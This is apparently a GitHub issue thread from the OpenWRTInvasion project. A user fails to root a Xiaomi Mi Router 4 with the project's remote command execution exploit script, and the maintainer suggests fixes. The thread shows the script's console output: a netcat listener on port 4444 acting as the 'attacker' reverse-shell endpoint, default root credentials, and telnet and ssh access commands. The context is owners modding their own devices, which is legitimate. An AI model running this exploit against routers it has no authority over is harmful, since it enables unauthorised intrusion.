acecilia/OpenWRTInvasion

Trying root Mi Router 4 (R4)

Closed this issue · 3 comments

I tried to root the R4 version, but was unsuccessful with the 2.26.175 firmware version.

miwifi_r4_firmware_8ed47_2.26.175.bin
https://mirom.ezbox.idv.tw/en/miwifi/R4/

root@controller:/ins/OpenWRTInvasion# python3 remote_command_execution_vulnerability.py
Router IP address [press enter for using the default 192.168.31.1]: 192.168.0.6
stok: a***************************d
****************
router_ip_address: 192.168.0.6
stok: a****************************
****************
start uploading config file...
start exec command...
done! Now you can connect to the router using several options: (user: root, password: root)
* telnet 192.168.0.6
* ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc -o UserKnownHostsFile=/dev/null root@192.168.0.6
* ftp: using a program like cyberduck
root@controller:/ins/OpenWRTInvasion# telnet 192.168.0.6
Trying 192.168.0.6...
telnet: Unable to connect to remote host: Connection refused

Any clues?

As in #21, with 0.0.1, but no success. Maybe the 192.168.31.1 address is mandatory?

root@controller:/ins/OpenWRTInvasion-0.0.1# python3 remote_command_execution_vulnerability.py
Start netcat on port 4444
(The way to do this in MacOS is to open a terminal and run '/usr/bin/nc -l 4444')
When you are done, press any key to continue
Router IP address: 192.168.0.6
Your IP address: 192.168.0.1
stok: aa364a422
****************
netcat_port: 4444
attacker_ip_address: 192.168.0.1
router_ip_address: 192.168.0.6
stok:aa364a4225
****************
start uploading config file ...
start exec command...
done!

No idea, I don't have an R4 router to test, so I can't tell if the exploit works or not 😞

Did you run /usr/bin/nc -l 4444 before running python3 remote_command_execution_vulnerability.py?
I don't know about your network configuration, but I would try to keep it as simple as possible.
You can also ask in the OpenWrt forum, there is an extremely long thread about this: https://forum.openwrt.org/t/xiaomi-mi-router-4a-gigabit-edition-r4ag-r4a-gigabit-fully-supported-and-flashable-with-openwrtinvasion/36685

I can see in the information you posted that the value for stok is aa364a4225. That is not a valid stok. Take a look at the README, where it is explained how to get the stok.